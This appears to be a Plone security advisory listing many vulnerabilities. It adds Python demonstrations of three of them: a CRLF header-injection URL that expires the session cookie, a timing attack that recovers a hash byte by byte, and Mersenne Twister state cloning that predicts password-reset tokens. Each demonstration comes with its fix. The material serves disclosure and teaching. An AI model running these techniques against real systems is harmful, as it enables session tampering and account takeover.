Security vulnerability announcement: 20121106 - Multiple vectors

Restricted Python injection

Anonymous users can cause an arbitrary Python statement to be run when the admin interface is accessed. No breakout of the built-in Python sandbox is possible, but the statement runs with the privileges of the admin user who accesses the interface.

Reflexive HTTP header injection

A crafted URL can inject arbitrary HTTP headers that are then returned in the response to the user. This can be used, for example, to log users out.
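The header-splitting mechanism behind this class of bug, as an added example that is not Plone's own code: a query parameter is reflected into a response header without validation, a CR LF inside the value ends that header, and the attacker's trailing text is parsed as further headers. The parameter name `came_from`, the hostnames and the cookie name `__ac` are illustrative assumptions; the hardened builder shows the check that stops the split.

```python
"""Added example (not Plone's code): HTTP response-header splitting through a
reflected URL parameter, and the check that prevents it.

Assumptions: the parameter name `came_from`, the hostnames and the cookie
name `__ac` are illustrative. The vulnerable serializer copies values into
the header block unchecked, so a value containing CR LF terminates the
header and whatever follows is parsed as further headers, here a Set-Cookie
that expires the session cookie and so logs the user out."""
from urllib.parse import parse_qs, urlparse

CRLF = "\r\n"


def redirect_headers_from_url(url):
    """Model of the bug: reflect the `came_from` query value into Location."""
    target = parse_qs(urlparse(url).query).get("came_from", [""])[0]
    return [("Location", target)]


def build_response_vulnerable(headers):
    """Serialize headers with no validation; CR LF inside a value splits it."""
    lines = ["HTTP/1.1 302 Found"] + ["%s: %s" % (k, v) for k, v in headers]
    return CRLF.join(lines) + CRLF + CRLF


def build_response_hardened(headers):
    """Same serializer, but refuse CR, LF and NUL in header names and values."""
    for k, v in headers:
        if any(c in k or c in v for c in ("\r", "\n", "\x00")):
            raise ValueError("control character in header %r" % k)
    return build_response_vulnerable(headers)


def parse_headers(raw):
    """Re-parse a serialized response the way a client would, so an injected
    header shows up as its own (name, value) pair."""
    head = raw.split(CRLF + CRLF, 1)[0]
    pairs = []
    for line in head.split(CRLF)[1:]:
        name, _, value = line.partition(":")
        pairs.append((name.strip(), value.strip()))
    return pairs


# Constructed crafted URL: %0d%0a decodes to CR LF; the ';' is encoded as %3B
# so that parse_qs does not treat it as a parameter separator.
CRAFTED_URL = ("http://www.example.test/login?came_from="
               "http://www.example.test/%0d%0aSet-Cookie:%20__ac=deleted%3B%20Max-Age=0")


def reflected_headers(url):
    """Attacker view: which headers does the client actually receive?"""
    return parse_headers(build_response_vulnerable(redirect_headers_from_url(url)))


def hardened_rejects(url):
    """Defender view: True if the hardened serializer refuses the request."""
    try:
        build_response_hardened(redirect_headers_from_url(url))
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    for name, value in reflected_headers(CRAFTED_URL):
        print("%s: %s" % (name, value))
    print("hardened rejects crafted URL:", hardened_rejects(CRAFTED_URL))
```

Rejecting CR and LF at the point where a value enters a header is the check that matters; escaping or encoding is the wrong tool here, because a Location or Set-Cookie value has no escaping syntax that a client will honour.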

Restricted Python sandbox escape

Accidental exposure of the sandbox whitelisting function, when it is imported from a certain nonstandard location, allows the sandbox to be escaped.

Restricted Python injection

A crafted URL allows arbitrary (sandboxed) Python to be run.

Partial restricted Python sandbox escape

Incomplete security declarations on certain objects allow permission checking to be bypassed for some functions.

Reflexive XSS

A crafted URL can supply a complete response body (or a redirect target) that is returned to the user, because internal methods of the response file handle are accidentally exposed at a URL.

Partial permissions bypass

A crafted URL can be used to access a subset of the attributes of unpublished content items, if the path of that content is known.

Restricted Python sandbox escape

Escape from the sandbox through a utility function that does not check that its inputs are valid, giving access to the trusted builtins.

Reflexive XSS

A utility function is callable directly through a crafted URL and accepts a caller-supplied default value, which is reflected in the response.

Restricted Python injection

A crafted URL allows arbitrary (sandboxed) Python to be run.

Anonymous users can list user account names

A method of the membership database is insufficiently protected, allowing users who lack the permission to enumerate users to do so through a crafted URL.

Partial denial of service through Collections functionality

The affected request causes large amounts of I/O and cache churn, so a site can be denied service if the request is issued repeatedly.

Anonymous users can batch change titles of content items

The batch id change script does not correctly handle anonymous users who change titles while leaving the ids unchanged. This allows anonymous users, once they have obtained a valid CSRF token, to craft a POST request that changes content titles arbitrarily.

Crafted URL allows downloading of BLOBs that are not visible to the user

BLOBs stored on custom content types can be accessed through a non-standard URL, bypassing the declared permission check.

Persistent XSS via filtering bypass

HTML content crafted by users may allow execution of arbitrary JavaScript in specific browsers.

Users connected through FTP can list hidden folder contents

Users can list the contents of folders (but not access the files themselves) that they would otherwise be unable to access.

Persistent XSS

Crafted URLs allow arbitrary strings (including full HTML) to be stored in memory against a key and then read back out on a related URL.

Attempting to access a view with no name returns an internal data structure

Some types of URL are ambiguous, and their unambiguous form allows anonymous view lookups. On some content types an anonymous view lookup returns a private data structure, which under certain circumstances can be used to read out confidential data.

DoS through RSS on private folder

A specially crafted URL invoking the RSS feed for a folder the user does not have access to (but knows the path of) can cause an infinite loop, tying up a server thread.

Timing attack in password validation

The equality test in our authentication system is not constant time: it returns as soon as a differing byte is found. A user with a sufficiently stable, fast connection to the server can therefore check hash prefixes, one byte at a time.
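Why a short-circuiting comparison turns a brute-force search into a linear one, as an added example that is not Plone's code. `leaky_equals` models a compare that stops at the first differing byte, and the `work` count it returns stands in for the latency an attacker would measure (the assumption being a connection stable enough to resolve per-byte differences); `recover_secret` is the attacker loop, and `constant_time_equals` shows the `hmac.compare_digest` fix, against which the same loop learns nothing.

```python
"""Added example (not Plone's code): how a short-circuiting equality test
lets an attacker recover a stored hash prefix by prefix, and the
constant-time fix.

Assumptions: `leaky_equals` models a comparison that stops at the first
differing byte, and the `work` count it returns stands in for the latency an
attacker measures over a fast, stable connection."""
import hmac


def leaky_equals(stored, candidate):
    """Vulnerable compare. Returns (equal, work); `work` grows with the
    length of the matching prefix, which is the timing side channel."""
    work = 0
    if len(stored) != len(candidate):
        return False, work
    for a, b in zip(stored, candidate):
        work += 1
        if a != b:
            return False, work
    return True, work


def constant_time_equals(stored, candidate):
    """Fixed compare. hmac.compare_digest's running time does not depend on
    where the inputs differ, so the modelled `work` is a constant."""
    return hmac.compare_digest(stored, candidate), len(stored)


def recover_secret(oracle, length):
    """Attacker: for each position try all 256 bytes and keep the one that
    makes the oracle work longest. Cost is 256 * length guesses instead of
    256 ** length. Positions not yet guessed are padded with zero bytes;
    the correct byte still wins because the compare runs on into the padding."""
    known = bytearray()
    for pos in range(length):
        best_byte, best_work = 0, -1
        for b in range(256):
            guess = bytes(known) + bytes([b]) + b"\x00" * (length - pos - 1)
            equal, work = oracle(guess)
            if equal:
                return guess
            if work > best_work:
                best_byte, best_work = b, work
        known.append(best_byte)
    return bytes(known)


def demo():
    """Run the attack against both compares. Returns (leaky_recovered,
    constant_time_recovered) as booleans."""
    # Constructed stand-in for a stored password hash.
    secret = bytes.fromhex("6dd7a8f3b2c0e14905aa3c7e8f0b1d22")
    leaky = recover_secret(lambda g: leaky_equals(secret, g), len(secret))
    safe = recover_secret(lambda g: constant_time_equals(secret, g), len(secret))
    return leaky == secret, safe == secret


if __name__ == "__main__":
    print("recovered against leaky compare, against constant-time compare:", demo())
```

In a real deployment the signal is network jitter on top of a few nanoseconds per byte, so the attacker averages many requests per guess; the structure of the attack is unchanged, and the fix is the same: compare hashes with `hmac.compare_digest` (or the platform's equivalent), never with `==`.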

PRNG isn't reseeded

We use Python's random module (seeded from the system random source at start-up) rather than the system random source itself, so in a long-running process the generator is never reseeded. In addition, our error pages leak random numbers, allowing the state of the PRNG used for password resets to be derived.
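What "the state of the PRNG can be derived" means in practice, as an added example that is not Plone's code. Python's `random` is a Mersenne Twister (MT19937), whose outputs are an invertible tempering of its 624 state words, so 624 consecutive 32-bit draws give the whole state back. The scenario below is assumed to mirror the advisory: one once-seeded generator, an error page that leaks a raw draw, and a reset token drawn from the same generator. `untemper`/`clone_mt` are the state-recovery step, `attack` predicts the next token, and `strong_reset_token` shows the fix.

```python
"""Added example (not Plone's code): recovering Mersenne Twister state from
leaked outputs and predicting a password-reset token, then the fix.

Assumed scenario, mirroring the advisory: the process seeds `random` once,
an error page leaks raw 32-bit draws from that generator, and the reset
token comes from the same generator. MT19937 is not a CSPRNG: its output is
a fixed, invertible tempering of the state words, so 624 consecutive 32-bit
outputs give back the whole state."""
import random
import secrets

N = 624  # MT19937 state size in 32-bit words


def _unshift_right(y, shift):
    # Invert  y ^= y >> shift  by re-applying it until every bit settles.
    res = y
    for _ in range(32):
        res = y ^ (res >> shift)
    return res & 0xFFFFFFFF


def _unshift_left(y, shift, mask):
    # Invert  y ^= (y << shift) & mask  the same way.
    res = y
    for _ in range(32):
        res = y ^ ((res << shift) & mask)
    return res & 0xFFFFFFFF


def untemper(y):
    """Undo MT19937's output tempering to get the raw state word back."""
    y = _unshift_right(y, 18)
    y = _unshift_left(y, 15, 0xEFC60000)
    y = _unshift_left(y, 7, 0x9D2C5680)
    y = _unshift_right(y, 11)
    return y


def clone_mt(outputs):
    """Build a random.Random in the same state as the generator that produced
    `outputs`, which must be 624 consecutive getrandbits(32) values."""
    if len(outputs) != N:
        raise ValueError("need exactly %d consecutive 32-bit outputs" % N)
    state = tuple(untemper(o) for o in outputs) + (N,)  # index N: buffer used up
    clone = random.Random()
    clone.setstate((3, state, None))
    return clone


# Vulnerable side (assumed shape of the leaky process).
def new_generator(seed=None):
    """Stand-in for the long-lived, once-seeded module-level generator."""
    return random.Random(seed)


def leaky_error_page(rng):
    """An error page that embeds one raw draw from the shared generator."""
    return rng.getrandbits(32)


def weak_reset_token(rng):
    """Reset token drawn from the same non-cryptographic generator."""
    return "%032x" % rng.getrandbits(128)


def attack(rng):
    """Attacker view: trigger 624 error pages, clone the generator, and
    predict the next reset token before the victim requests it."""
    leaked = [leaky_error_page(rng) for _ in range(N)]
    clone = clone_mt(leaked)
    predicted = weak_reset_token(clone)
    actual = weak_reset_token(rng)
    return predicted, actual


def strong_reset_token():
    """Fix: draw from the OS CSPRNG, which exposes no recoverable state."""
    return secrets.token_urlsafe(32)


if __name__ == "__main__":
    predicted, actual = attack(new_generator())
    print("predicted:", predicted)
    print("actual:   ", actual)
    print("match:", predicted == actual)
    print("safe token:", strong_reset_token())
```

Reseeding would only narrow the window; the real fix is to stop using a statistical generator for anything an attacker must not predict, which is what `secrets` (or `random.SystemRandom`, both backed by `os.urandom`) provides, and to stop printing raw random values on error pages.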

Form detail exposure

A vulnerability in z3c.form leaks the default values of form fields through crafted URLs.